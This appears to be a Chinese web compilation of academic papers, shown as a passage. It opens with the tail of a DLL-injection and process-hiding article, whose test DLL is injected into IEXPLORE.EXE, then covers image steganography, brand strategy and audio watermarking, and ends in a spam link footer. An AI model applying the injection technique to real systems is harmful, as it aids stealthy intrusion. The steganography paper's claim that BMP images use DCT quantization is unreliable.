MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

returnTRUE;

}

當使用RmtDll.exe程序將這個hide.dll嵌入IEXPLORE.EXE進程后假設PID=1208),該測試DLL彈出了1208字樣的確認框,同時使用PS工具

也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\WINNT\hide.dll(0x100000000)

……

這證明hide.dll已經在IEXPLORE.EXE進程內正確地運行了。上面程序的頭文件由編譯器自動生成,未作改動,故略之。

5結束語

進程隱藏技術和方法有很多,而且這一技術發展也相當快,本文僅從一個側面加以討論,希望通過這一探討讓我們對進程隱藏技術有一個更清楚的認識,同時也為我們防范他人利用進程隱藏手段非法入侵提供參考,本文拋磚引玉,不當之處誠懇批評指正。

參考文獻

第6篇

【 關鍵詞 】 信息隱藏;DES;載密

【 中圖分類號 】 TN915.08 【 文獻標識碼 】 A

【 Abstract 】 This paper presents a kind of information hiding technology, first of all, through using DES encryption algorithm to encrypt files, and then through information hiding, encrypted file hidden in the BMP image, the encryption image is exactly the same with the original image, the protection of the data is implemented very well.

【 Keywords 】 information hiding; des; encryption image

1 引言

信息隱藏是上世紀90年代開始興起的信息安全新技術,并成為信息安全技術研究的熱點。傳統通信領域為了保證傳遞的信息能夠不被竊聽或破壞,常采用密碼來保護信息,即讓竊聽者無法看到或聽懂,但是這種技術的缺點是告訴竊聽者這就是秘密信息,特別是隨著計算機技術的發展,密碼的安全性受到很大挑戰。而新的信息隱藏技術是將需要傳遞的秘密信息,隱藏在一個普通的非秘密消息當中,再進行傳輸,這樣即使竊聽者竊聽了傳輸的信息,也只會將其當成普通的消息,而不會懷疑或者無法得知是否有秘密信息的存在。

BMP是目前最常見的一種圖像格式,采用BMP圖像作為隱藏消息的載體具有許多優點。首先,BMP圖像格式是互聯網上圖像傳輸的事實標準,使用這一圖像格式比起其它格式來更不會引起懷疑。其次,BMP壓縮造成的和秘密消息嵌入帶來的圖像質量退化是肉眼很難分辨的。為了更好地保證信息的安全性,本文把文件密碼加密和信息隱藏這兩種技術結合起來:首先利用DES(Data Encryption Standard)把信息文件進行加密,然后把加密后的文件通過選定的BMP圖像以特定算法進行隱藏。

2 信息隱藏算法

信息隱藏把前面的加密信息隱藏在無關緊要的載體BMP圖片中,第三方并不知道秘密通信這個事實的存在,也就是將秘密信息本身的存在藏起來,即使得到了載密對象,也看不到存在的秘密信息。

隱藏算法通過對BMP圖像中選定的DCT系數進行微小變換,以滿足特定的關系來表示一個比特的信息。在提取隱藏的信息時,根據隱藏的逆過程抽取比特信息。其特點是隱藏的數據量較少,但是其抵抗幾何變換等攻擊的能力較強。

在BMP編碼中,量化過程是多對一的映射,它是有損變換過程,如果在量化前嵌入秘密消息,會丟失一些信息,從而導致解碼時不能正確的獲得秘密信息。因此,BMP圖像的隱寫算法的基本原理必須在量化后進行。由前所述,人眼對亮度信號比對色差信號更敏感,因此本工作將秘密消息與量化后的Y分量的DCT系數的LSB聯系起來,從而達到嵌入和提取秘密信息的目的。

隱藏流程如圖1所示,具體分為三步驟。

(1)對BMP圖像的壓縮數據進行解碼,得到量化后的DCT系數。

(2)按照隱寫算法的嵌入規則對Y分量的DCT系數進行修改,將要隱藏的秘密消息嵌入到其中。

① 首先對載體圖像按照8×8的分塊方式進行分塊。如果載體圖像的行數和列數的像素個數不為8的倍數時,則要進行邊界擴充處理,使得行數和列數的像素個數都是8的倍數。設載體圖像的行數為ImgHeight,列數為ImgWidth,Y在行和列方向上的采樣率分別為SampRate_Y_H和SampRate_Y_V,則整幅圖像被分為MCUNum = ImgWidth * ImgHeight / (64 * SampRate_Y_H * SampRate_Y_V)個小塊。

② 讀入待隱信息文件,把其轉換為二進制的位流。設待隱信息文件的長度為FileLength。為了以后提取待隱信息,需要傳遞文件長度,用2個字節表示,可表示的最大數為65535。這樣總的需要隱藏的信息長度 TotalFileLength = FileLength + 2,單位是字節。

③ 對一個MCU,按照對Y分量的DCT系數最低位進行修改。查找預定義的矩陣MIDBAND,該矩陣由數值0,1組成,對其中數值為1的位置修改對應DCT的頻率系數:如果當前待隱信息的二進制值為0,則把相應位置的頻率系數值的最低為修改為0;如果當前待隱信息的二進制值為1,則把相應位置的頻率系數值的最低為修改為1。

④ 對待隱信息文件的二進制流按照③的隱藏方案進行信息隱藏。如果待隱信息文件長度大于載體圖片的最大隱藏量,則把待隱信息文件按照最大隱藏量進行分段,然后分批按照隱藏流程處理。

(3)對修改后的DCT系數進行編碼,重新生成壓縮數據,即載密BMP圖像。對于上面分批隱藏的,生成系列載密圖像如圖2所示。

秘密消息的提取過程是嵌入過程的逆過程,提取算法要和隱寫算法相對應。

3 結束語

在網絡飛速發展的今天,信息隱藏技術的研究具有現實意義。本文將DES加密技術與信息隱藏技術相融合,將加密后的信息隱藏到最常見的BMP圖片中,使整個信息隱藏過程達到比較高的安全級別。信息隱藏技術在商業中的廣泛應用,是一個跨多領域、多學科(數字信號處理、圖像處理、模式識別、數字通信、多媒體技術、密碼學、語音處理等)的技術體系,由于它與具體的應用密切相關,這也決定了信息隱藏技術研究成果的多樣性以及信息隱藏技術研究的不完善性,仍有許多技術問題需要解決。但可以相信,隨著科學技術越來越發達,信息隱藏將有更加廣闊的發展空間。

參考文獻

[1] 夏煜,郎榮玲,曹衛兵等.基于圖像的信息隱藏檢測算法和實現技術研究綜述[J].計算機研究與發展,2004, 41(4):728-736.

[2] 陳波,譚運猛,吳世忠.信息隱藏技術綜述[J].計算機與數字工程, 2005, 33(2):21-23.

[3] 陳雅.基于數字圖像的信息隱藏技術綜述[J].福建電腦,2008, (2):6-6.

[4] 劉強,方錦清,趙耿,李永.基于FPGA技術的混沌加密系統研究[J]. 物理學報,2012,61(13):130508.

第7篇

關鍵詞:圖像信息隱藏;雙線性算法;奇偶層錯位分塊算法

中圖分類號:TP309.7

本文主要探討的是關于改進的雙線性插值的圖像信息隱藏算法在信息隱藏方面的應用,通過利用改進過的雙線性算法對網絡信息圖像進行安全性保證,其中涉及到原理闡述、實例分析操作等內容。

1 基于改進的雙線性插值的圖像信息隱藏算法研究

1.1 雙線性插值原理

基于改進的雙線性插值的圖像信息隱藏算法在對網絡信息數據進行隱藏的具體操作中,根據改進的雙線插值與鄰近像素插值之間進行整合的途徑達到對信息數據隱藏的目的,從而實現網絡信息數據的安全性保護。具體應用原理是先通過把要處理的信息數據載體圖像當作是已經進行了兩倍放大處理的結果,這時候找到放大時候的插值點,該插值點即就是信息數據的嵌入點。通過利用改進后的雙線性插值法作為信息重新插值的接入點,即能夠為網絡信息數據的隱藏提供更多的可利用空間。在此基礎上,通過使用鄰近像素之間的差值對網絡信息數據進行隱藏處理,后面對于該網絡信息數據的提取操作則是該隱藏操作的相反過程[1]。

1.2 信息隱藏操作步驟

對于需要進行安全藏的網絡信息數據,通過對這寫數據信息進行圖像載體的處理,經過圖像處理的這些載體我們記作A,對于該載體A進行安全藏處理可以分為五個具體的操作:

第一步:對要處理的圖像A進行分塊處理,分成連續不重疊的四塊,把秘密圖像的像素灰度值進行二進制轉化,轉化為相對應的二進制信息數據。

第二步:利用改進后的雙線性插值途徑對那些需要進行隱藏秘密信息數據的方塊進行插值操作處理[2]。

第三步:對這些進行處理的像素處理塊進行嵌入點的計算,計算出這些嵌入點與方塊信息數據的基準點之間差值的絕對值d,如果計算出來的d絕對值超過了數值1的情況下,則可以對這些數據信息進行隱藏處理,反之則不能夠對這些數據信息進行隱藏。對d絕對值的計算操作如表1所示,也就是首先要對水平方面的差值進行計算,然后才可以對垂直方向的差值進行計算,最后對斜方向上的差值大小進行計算[3]。

表1 差值計算具體順序表

第四步:通過公式X=Pi/K,Y=Ri/K計算出數據信息中所有數據塊中的嵌入點能夠進行二進制信息的位數n,該n的具體計算公式如下:

n=log

第五步,對于前面已經找出來的秘密信息按照順序找出n位的二進制具體數據信息,把這些二進制的數據信息轉化為十進制數位的信息,再把這些十進制的數據信息和嵌入點的像素灰度進行相加計算處理[4]。

2 利用改進的雙線性插值的圖像信息隱藏算法實例

2.1 具體數據信息隱藏實例分析

選擇其中一塊數據信息作為分析實例,以第二塊為例,這些秘密數據信息假設是11101010……,通過一定的順序對這些數據信息進行隱藏處理,具體的隱藏操作過程的像素灰度值的變化情況如圖1示,在該圖中的S代表的是這些秘密處理信息數據。

12 14 13

13 10 14

18 16 14

圖1 具體隱藏過程操作圖

通過上面圖形計算過程如下:

水平方向計算過程:首先對第二個像素塊中水平方向上的數據信息進行計算,這時候計算出來的差值絕對值可以記作為d=4,然后對該數據信息進行隱藏容量額計算,計算出來的結果是n=3,這時候在對秘密信息進行選擇,取出改秘密信息的前三位101,把這前三位數據轉變為十進制的信息數據即也就是為5,在此基礎上把通過十進位數據信息的處理方式把原來的秘密信息嵌入到載體圖像中,這時候就可以得到數值13,對該數據信息進行隱藏處理后,再把載體圖形的像素灰度值進行處理表示出來,最終表示為上面圖形的形式,這時候原來的秘密信息就轉化為了10101010……。

垂直方向計算過程:首先對第二個像素塊中垂直方向上的數據信息進行計算,這時候計算出來的差值絕對值可以記作為d=1,然后對該數據信息進行隱藏容量計算,計算出來的結果是n=1,這時候在對秘密信息進行選擇,取出改秘密信息的前一位1,把這前一位數據轉變為十進制的信息數據即也就是為1,在此基礎上把通過十進位數據信息的處理方式把原來的秘密信息嵌入到載體圖像中,這時候就可以得到數值12,對該數據信息進行隱藏處理后,再把載體圖形的像素灰度值進行處理表示出來,最終表示為上面圖形的形式,這時候原來的秘密信息就轉化為了010101……。

斜平方向計算過程:首先對第二個像素塊中水平方向上的數據信息進行計算,這時候計算出來的差值絕對值可以記作為d=2,然后對該數據信息進行隱藏容量額計算,計算出來的結果是n=2,這時候在對秘密信息進行選擇,取出改秘密信息的前兩位01,把這前三位數據轉變為十進制的信息數據即也就是為1,在此基礎上把通過十進位數據信息的處理方式把原來的秘密信息嵌入到載體圖像中,這時候就可以得到數值11,對該數據信息進行隱藏處理后,再把載體圖形的像素灰度值進行處理表示出來,最終表示為上面圖形的形式,這時候原來的秘密信息就轉化為了0101……。

到此為止,已經對四塊數據信息的像素塊的秘密信息進行了嵌入處理,一共是對6位數據信息進行了隱藏處理,其中剩下的秘密數據信息通過同樣的計算處理方法進行順序性的嵌入,直到最后所有的數據信息都進行了嵌入處理,實現安全隱藏操作的完成。

2.2 信息隱藏實例結果分析

基于改進的雙線性插值方法對圖像信息進行隱藏的過程中,首先需要對隱藏結果進行監測,選擇網絡中圖庫中的一幅圖片進行檢測,首先要對這些圖片按照512*512的灰度要求進行處理,經過處理后的圖片再作為載體圖像進行檢測實驗操作,然后通過使用分辨率在130*130的Lena圖像作為該隱藏信息操作的秘密圖像,這時候利用改進的雙線性插值方法對這個需要隱藏的圖像進行隱藏處理,這時候會發現隱藏后的圖像展現出了比較好的視覺效果。

3 結束語

對于網絡信息數據的安全性進行研究是保障網絡安全性的重要前提,本文通通過利用雙線性插值方法對圖像數據進行安全藏處理方面的內容進行分析,從應用原理、操作過程、結果檢測等方面進行了研究,同時還列舉了模塊進行案例分析,但是關于雙線性插值方法對圖像數據進行安全藏方面的應用還需要在實踐中進行進一步的探索。

參考文獻:

[1]TUmerLF.Digitaldatasecuritysystem.PatentIPNWO89/089151,2011.

[2]BenderW,Gruh1D,MorimotoN,LuA.Techniquesfordatahiding.IBMSystem Joumal,2012.

[3]姜楠.信息隱藏和隱藏分析的理論與算法研究[D].北京郵電大學博士論文,2011.

第8篇

多品牌策略就是給每一種產品冠以一個品牌名稱,或是給每一類產品冠以一個品牌名稱。多品牌策略主要包括兩種情況:一是在不同的目標市場上,對同種產品分別使用不同的品牌;二是在同一市場上,對某種產品同時或連續使用不同的品牌。例如,寶潔公司在中國推出了四個品牌洗發水:海飛絲、飄柔、潘婷、沙宣,每一品牌都以基本功能以上的某一特殊功能為訴求點,吸引著不同需要的消費者。希望自己“免去頭屑煩惱”的人會選擇海飛絲;希望自己頭發“營養、烏黑亮澤”的人會選擇潘婷;希望自己頭發“舒爽、柔順、飄逸瀟灑”的人會選擇飄柔;希望自己頭發“保濕、富有彈性”的人會選擇沙宣。

二、多品牌策略的優點

多品牌策略在實踐中屢見不鮮,多品牌策略的優點很多,主要有:

(一)多品牌具有較強的靈活性。沒有一種產品是十全十美的,也沒有一個市場是無懈可擊的。浩瀚的市場海洋,為企業提供了許多平等競爭的機會,關鍵在于企業能否及時抓住機遇,在市場上搶占一席之地。見縫插針就是多品牌靈活性的一種具體表現。

(二)多品牌能充分適應市場的差異性。消費者的需求是千差萬別的、復雜多樣的,不同的地區有不同的風俗習慣;不同的時間有不同的審美觀念;不同的人有不同的愛好追求,等等。

(三)多品牌有利于提高產品的市場占有率。多品牌策略最大的優勢便是通過給每一品牌進行準確定位,從而有效地占領各個細分市場。如果企業原先單一目標顧客范圍較窄,難以滿足擴大市場份額的需要,此時可以考慮推出不同檔次的品牌,采取不同的價格水平,形成不同的品牌形象,以抓住不同偏好的消費者。

多品牌策略不僅僅是企業滿足消費需求的被動選擇,也是企業制定競爭戰略的主動選擇。對市場攻擊者和挑戰者而言,其搶占市場的一個慣用伎倆就是發展出一個專門針對某一細分市場的品牌來逐漸蠶食;對市場領導者而言,與其坐等對手來占據某一細分市場,不如自己先發展出一個品牌去搶占,實施有效防御,從而鎖定不同目標消費群。

三、多品牌策略的不足

當然,每個策略都不是完美的,多品牌策略也存在著缺陷,企業若在同一市場中發展多個品牌,成本成長的速度會比收入還快,在零售商與內部資源分配上,也會遇上復雜的管理難題。在推出一項品牌之前,企業通常會比較它們預期會產生的額外收入以及行銷該品牌的成本。這類成本通常超乎主管的想像,因為“多品牌”策略有一項嚴重的限制;它會因不具規模經濟而受害。一家公司會因在一個市場中推出數個品牌,而招致隱藏的成本,而且在事情發展超過某一點之后,就會有綁手綁腳之苦。

盡管隱藏成本的累積速度相當緩慢,但如果公司將太多品牌塞入這個產品類別,隱藏的成本就出現了。隱藏成本有四種可能呈現方式:

(一)成本重疊。當企業無法透過獨一無二的方式為每一個品牌進行定位時,成本就會攀升。通常,品牌會在特色、屬性或價格方面出現重疊,只是企業主管未意識到罷了。這些品牌彼此競爭的程度,和它們與對手品牌之間的競爭程度不相上下,而且最后通常演變為彼此互相吞噬。如此一來,公司成本的上升速度會比收入成長速度還快。

(二)效率不彰。很多公司已經運用自己的品牌開創出幾項顯然有利可圖、但規模很小的利基。缺乏數量上的優勢并未讓他們的行銷人員擔心,因為他們力圖達成的是整個品牌組合的銷售最大化,而不是個別品牌的銷售最大化。但是,這類的公司遲遲才了解,維持一大群品牌(而且每項品牌的運營規模都相對較?。┑某杀?,相對而言,比推銷幾項大品牌的成本要高。例如,要制造各式各樣的產品,工產方面需要大量的裝備成本以及較長的機器停工時間,從而會導致較高的生產成本。

(三)零售商利潤高昂。當企業推出多項品牌時,要為這些品牌取得零售上架空間,上架成本會高得讓你不得不打退堂鼓。大型零售廠商,如美國的沃爾瑪百貨與歐洲的家樂福,一般在每項產品分類中只將前兩大或前十大品牌上架。零售商運用領導品牌吸引顧客上門,但隨后就向購物者推銷自有品牌。

(四)管理難度加大?!岸嗥放啤辈呗孕枰M行協調,包括從產品創新與包裝改變,到經銷商關系與零售商促銷的。大型的品牌組合也需要經常進行價格變動與庫存調整,這些工作會消耗所費不貲的管理資源。

此外,品牌擴增為企業帶來最大成本的時候,不是現在,而是在未來。那些在市場中具有大型品牌組合的公司,經理人不斷掛念在心的,往往是品牌之間的經費配置,而不是公司前途或有關競爭對手的問題。這類沖突的陰影常使企業組織揮之不去,讓他們在面臨更加專注的對手競爭時,顯得脆弱不堪。

四、多品牌策略的應用

(一)明確品牌定位。定位意味著犧牲,意味著有所不為,而企業的擴張又希望無所不為。企業在完成資本積累開始對外擴張的過程中,若堅持統一品牌策略,讓所有開發的新產品都套用原品牌,就會面臨兩難選擇:若進行品牌延伸,盡管極為謹慎行事,采取了防范措施,但也可能出現品牌形象淡化、每一種產品都缺乏個性而被對手各個擊破的風險;若放棄某些領域的品牌延伸,則意味著必須放棄一部分市場。要解決這一難題,一個可行的辦法就是要采取產品定位的多品牌策略。

(二)建立內在相關性。品牌管理涉及到采購、生產、營銷、財務、人力等各個環節。對多品牌企業而言,不能只關注單個品牌,而必須注意同一系列品牌之間的相互關聯和影響。內在相關性主要是指,在實施多品牌策略時必須能夠在幾個品牌之間形成良好的資源整合和共享機制。任何一個企業的資源和精力都是有限的,因此為了充分利用企業的內外資源,可以成立完善的研發、采購公共平臺,同時在渠道資源方面也實現良好的品牌互動和共享,并以完全不同的渠道策略來實現品牌間的良性競爭。品牌之間的高效整合與共享是歐萊雅取得成功的關鍵,其主要體現在技術和渠道這兩個兼容性極強的方面。在技術方面,歐萊雅盡量發揮技術平臺的相關效應。

(三)發揮企業品牌對多品牌策略的杠桿作用。多品牌策略中,品牌關系的管理還包括企業品牌和產品品牌之間關系的管理。企業品牌用于維護企業整體形象,對現有和潛在的員工來說,它是一種激勵;對投資者而言,它意味著信心;對于產品品牌,它提供的是承諾。企業品牌代表的是企業的外部形象,對產品品牌有很強的杠桿作用。歐萊雅深知企業品牌的重要性,將其營銷推廣跨越個別產品線的產品品牌宣傳,將光芒聚焦到企業品牌上來,最終形成一股激化不同產品品牌的能量。

綜上所述,企業要使用多品牌策略進行市場競爭,需要注意多方面的內容。首先在品牌定位時要注意各品牌之間的關系,使各個品牌互相不沖突,并且協調各個品牌之間的內在關系,找出重點培育的品牌,以重點品牌促進其他品牌的發展,同時又需要防止那些做得不成功的品牌影響重點品牌的價值。在培育各個品牌的同時注意隱藏成本的增加,盡量減少隱藏成本,避免因為隱藏成本拖垮了各個品牌的擴張,做到了這些才能使企業的多個品牌健康地發展,使企業在競爭中獲勝。

論文關鍵詞:多品牌;品牌定位;品牌關系

論文提要單一品牌已越來越難以滿足消費者的需求,實施多品牌策略成為眾多企業競爭市場的手段。本文分析多品牌策略的概念、優點和缺點、使用范圍、實踐應用,希望對企業的品牌決策提供幫助。

主要參考文獻:

[1]巨天中.品牌戰略.中國經濟出版社,2004.5.

第9篇

    論文摘要:提出了一種基于小波分解和倒譜技術的音頻數字水印算法,該算法通過對原始音頻進行小波多級分解,從中選取低頻系數進行倒譜變換。通過統計均值的計算和調整方法設計,完成了水印的嵌入。實驗結果表明該算法能夠有效地抵抗a/d和d/a攻擊,誤碼率為o,隱藏容量較大。同時,本算法還能夠抵抗一定的amr攻擊,為手機音頻的安全傳播和管理提供了新的前景。

論文關鍵詞:音頻水印;小波變換;倒譜;模/數轉換;amr格式

0引言

在電視廣播、交通臺和音樂會等公共信息傳播領域,音頻的版權管理和安全傳輸都非常重要。如果采用數字水印技術,則需要水印算法能夠抵抗a/d和d/a轉換。目前,具有這種變換的類型可以劃分為三種。第種是基于電纜傳輸方式,以電話線傳播和直通電纜連接為典型,所受干擾小。電話線方式是公用信道,能夠傳播很遠,傳輸秘密水印的載體可以是話音或音樂等類型;而直通電纜方式一般在一個辦公實驗的局部環境中。第二種是基于廣播方式,通過廣播媒體或專用頻道進行傳播。第三種是基于空氣直接傳播方式,會遭遇各種干擾,通常只能近距離設計。由于音頻水印的遠程傳輸和提取具有廣泛的應用價值,這些音頻傳播水印技術在國外已經受到了極大重視并有所成果。在空氣傳播水印信息方面,德國的steinebach等人…開展了最早的研究,通過設定5—4oocm的多個不同間距,同時使用了4種不同的麥克風,研究了5種音頻類型的水印技術,在5~180cm的間距普遍獲得了良好的提取效果。隨后,日本的achibana等人口研究將水印實時地隱藏到公共環境如音樂演奏會的音樂之中,能夠成功地在一個30s音樂片段內隱藏64b的消息,測試的空氣傳播距離為3m。在電話網絡傳播方面,加拿大的chen等人開展了模擬電話通道的隱藏,在誤碼率小于0.001時,其數據帶寬達到了265bps。日本的modegi等人設計了一套非接觸水印提取方案,通過手機來廣播或轉存水印音頻,然后,通過計算機將秘密從轉存的音頻文件提取出來。隱藏帶寬達到61.5bps,提取率高于90%。但是,這幾種研究結果并沒有對算法做詳細描述。在直通電纜傳播方面,項世軍等人采用了三段能量比值方法,嵌人的是一串32b信息,雖然提取效果比較好,但由于實驗容量太小,實用性不夠,且對同步技術有較高的要求;王讓定等人采用改進的量化方法、馬冀平等人”采用了dct方法,嵌入的都是小圖片,但提取效果一般,僅可辨認。雷贄等人在短波廣播含水印音頻算法方面取得了可喜的進展,通過多種同步方案和算法設計,使水印提取的模擬和實測過程都達到了較好的效果,但實驗容量很小。此外,由守杰等人設計了一種相似度計算方法,由于是非盲提取,不適于廣播通信領域。作者利用小分段的直方圖特性,開展了抗a/d轉換的音頻水印初步研究,在每段開頭總能獲得正確提取,但在每段的后續隱藏效果不佳,還需要做許多改進。

可見,在面向公共音頻傳播方面,如何既能提高隱藏效果又能增大容量,仍然是音頻水印算法要解決的一個難題。本文通過數據特性分析,采用倒譜技術和小波分解方法,成功地解決了問題,且能夠抵抗一定的手機彩鈴amr攻擊,為實用化提供了重要基礎。

1數據特性描述

音頻信號經過具有a/d和d/a轉換的傳輸過程時,必然要涉及到以下問題:

1)音頻信號要經歷傳輸過程中的外加干擾,包括50hz的工頻電信號,因此,需要選擇大于50hz的音頻頻率信號;

2)因聲卡特性不同,音頻轉換過程不一定具有線性模型;

3)傳輸中錄制的音量往往與播放的音量不一致,這要求水印算法能夠抵抗音量的大范圍變化;

4)傳輸中錄制開始時刻可能早于也可能晚于播放時刻而且結束時刻也不一定一致,所以水印隱藏的起始位置需要沒置標志;

5)轉換過程具有一定的濾波特點,可濾除較高頻率信號。

1.1音頻頻率范圍選擇

對照音頻頻率響應特性圖可以發現,在低頻部分的閾值比2khz~4khz的要高得多,不容易察覺;尤其是1khz以下部分,其不可感知性要好得多。文獻[4]的實驗也表明,音頻數據通過a/d和d/a轉換后,其低頻范圍700hz以下的損失非常小??梢姡x擇在頻率為(50,700)范圍內的音頻數據,用于信息隱藏非常有利。

1.2倒譜系數的選取方法

倒譜變換在音頻水印中已經具有了較強的健壯性,能夠抵抗噪聲、重采樣、低通濾波、重量化和音頻格式轉換等常見攻擊。倒譜變換后的數據特征表現為:倒譜系數在中間部分的差異很小,而在兩端的變化很大。

圖1是對音頻進行7級小波分解后,選取5~7級高頻數據部分進行倒譜變換情形。在進行統計處理時,如果讓全部數據參與,則計算結果在隱藏前后有明顯變化;如果不考慮兩側若干個大數據,僅以中間大部分數據參與運算,則計算結果容易保持在一個穩定范圍內。

進一步,如果將計算的均值移除,即相當于此時的均值為0。然后,在0的上下兩邊產生一個偏差,如2,以分別隱藏比特信息“1”和“0”。則在提取時,只需要判斷所求均值是否大于0,就可以求得水印比特。這種方法,稱之為“數據分離調整”技術。

2算法分析與設計 

2.1隱藏算法流程設計

將原始音頻分段時,段數至少是水印比特數。然后,對每段數據進行小波分解,取其低頻系數進行倒譜變換,采用前述的數據分離調整技術,以實現水印比特嵌入。之后,先后重組倒譜系數和小波系數,獲得含有水印信息的音頻段,從而構造為新的音頻。該算法流程如圖2所示。

為了增強可靠性,對水印信息先做糾錯處理,采用bch編碼方法。算法的主要工作是尋找合理的參數優化配置,使隱藏效果達到最優。參數主要有:小波分解級數、分段的數據幀長度、數據幀的間距、上下分離的閾值將數據幀的間距設置為數據幀長度的倍數,最大為1,最小為0。期間選擇多個系數,結果發現都可以成功實現隱藏。

2.2水印嵌入算法設計

1)水印信息處理。

音頻載體分段數至少應該大于,才能滿足隱藏要求。

假設每段長為,該段經過小波變換的級分解后,各級小波系數長度分別為:

取低頻系數部分,使之頻率范圍位于(50,l000)內,則需要構造一個組合的低頻小波系數集合。以8khz音頻為例,實施7級小波分解后,所選擇的低頻系數部分為:

p的長度非常重要。如果太小了,對隱藏不利;反之,就需要更長的音頻載體。所以,音頻分段與小波分解具有密切的關系。

3)倒譜變換。

復倒譜變換對于信號序列的均值大于或等于0時,其逆變換可逆;否則不可逆。為此,需要計算指定段信號的均值,若均值小于0則取反。然后對所有指定段進行復倒譜變換。

4)倒譜系數的選取。

去掉首尾波動很大的部分,而選擇中間平穩的部分嵌入水印。假設兩端各去掉l0個數據,則實際用于隱藏水印的倒譜系數長度為:

5)去均值化處理。

計算剩余部分的均值,然后用每一個倒譜系數減去該均值,得到倒譜系數的相對值。 

6)嵌入水印。

給定一個閾值t,采用整體上下拉開的思路,對以上的相對倒譜系數進行修改,得到最終的倒譜系數,從而實現水印的嵌入。

7)重構音頻信號。

對嵌入水印的段重構后,實施復倒譜反變換。然后進行小波重構,從而得到含有水印比特的音頻段。將所有這些段重構,就獲得了含全部水印信息的音頻。

2.3水印提取

水印提取過程的前半部分與嵌入過程是一樣。在提取出比特序列后,再經過bch解碼處理,從而得到隱藏的水印比特序列。水印提取的流程如圖3所示。

對獲得的倒譜系數去兩側數據,計算剩下的倒譜系數平均值。按照以下規則進行隱藏信息的提取:

在信息傳播方面.針對a/d和d/a傳播采用『_直通電纜的傳輸方式,在單機上用電纜將音頻輸入輸出口相連。傳輸線為音頻線1.8m和延長線1.8m,共3.6m。此外,針對手機彩鈴傳播采用了amr方式。隱藏水印設計了三種方案,如圖4所示。

小容量的便于amr處理,大容量的便于實用化。

仿真工具為matlab7.2.使用windowsmediapldrver播放器播放音頻載體,使用cooledit pro工具進行錄音、編輯和攻擊處理。

基本參數選擇為:選用harr小波進行7級小波分解后,按照式(4)選取低頻系數區域,所得頻段在77.5~5o0hz范圍。式(7)中的為l0,式(9)中t值的合適范圍在0.005~0.025中實驗選取。式(3)中的取值為3200非常合適,此時,實際參與計算均值的數據為155。

3.2音頻載體的影響

音頻載體選擇了三種,如表1所示,  

其采樣頻率8khz,樣本精度為16b,單聲道,段的長度為3200。音頻轉換為8khz的目的是為了今后在電話網上的隱蔽傳輸,并可以轉化為amr文件,傳輸到手機中,成為手機彩鈴的版權管理目的。

經過a/d和d/a傳播后,4×4水印提取的誤碼情況如表1所示??梢?,載體的選用非常重要;同時,從音頻質量上考慮,選用較小的t值更有利于保證信噪比。所以,以下的實驗采用的是“奧運主題歌”。

3.3閾值參數的合理計算

選擇了水印“北”進行比較測試,如圖5所示。結果表明,在t值為0.016時,誤碼率為0,效果最佳。為此,后續實驗也采用該值。

3.4大容量a/d和d/a傳輸

采用圖像水印“北京”進行大容量測試,音頻載體選用“奧運主題歌”。圖6為經過a/d和d/a轉換前后的數據均值計算對比情況.共有bch編碼的555個數據。按照式(10)

提取后,能夠完全正確提取,且誤碼率為0。進一步,將本文算法的實驗效果與已有屬于盲提取的研究結果相比較,如表2所示。

可見,本文算法雖然帶寬小,但水印能夠正確提取,而且嵌入容量較大。由于實驗中使用了8khz的音頻載體,能夠廣泛應用于語音傳輸和手機彩鈴等場合,所以在電話網絡廣播方面的實用性強。

3.5抗amr轉換

隨著手機彩鈴的普遍使用,彩鈴的安全傳播和管理將成為新的問題。本算法在這方面也開展了新的嘗試,將水印隱藏在彩鈴中,可以起到版權保護或秘密信息傳播的作用。

目前手機錄音放音格式多數是amr格式,要求算法能夠抵抗amr轉換攻擊。在上述的音頻載體中成功完成水印嵌入后,需要將采樣精度l6b、采樣頻率為8000的波形音頻轉換為amr格式,就可以存入手機中使用或發送給他人。提取時,先將amr文件轉換為wav格式,然后再提取水印信息。

amr轉換工具為miks0ftmobiieamr convener,可以進行wave與amr兩種格式的相互轉換。實驗中使用的水印信息為圖4(a)水印,采用bch(31,16,3),閩值設置為0.0195時,b脒達到0,取得了滿意的效果。

相關文章
主站蜘蛛池模板: 精品欧美一区二区三区精品久久 | 久久一区二区三区免费 | 福利在线播放 | 国产成在线观看免费视频成本人 | 国产精品99久久久久久人 | 99视频在线观看高清 | 精品一区二区视频 | 免费一级肉体电影片 | 国产精品久久久久久久牛牛 | 色综合久久中文 | 精品久久久久国产免费 | 欧美一级艳片爽快片 | 成人精品视频一区二区三区 | 精品无码久久久久国产 | 欧美爱爱小视频 | 毛片小视频 | 福利试看 | 91丁香亚洲综合社区 | 国产成人精品日本亚洲11 | 无码一区二区三区视频 | 丁香五月欧美成人 | 全国男人天堂网 | 国产精品久久久久久久午夜片 | 国产精品免费观看视频播放 | 狠狠亚洲婷婷综合色香 | 在线小视频国产 | 日本视频免费播放 | 草老女人| 久久久久免费精品国产 | 欧美天天干 | 欧美高清一区二区三区 | 福利社电影| 啦啦啦视频在线 | 男人天堂网在线观看 | 久久99精品久久久久久久野外 | 国产在线观看免费 | 四虎影院海外永久 | 九九99九九视频在线观看 | 久久国产成人午夜aⅴ影院 久久国产成人精品国产成人亚洲 | 精品国产免费观看久久久 | 国产精品视频一区二区三区不卡 |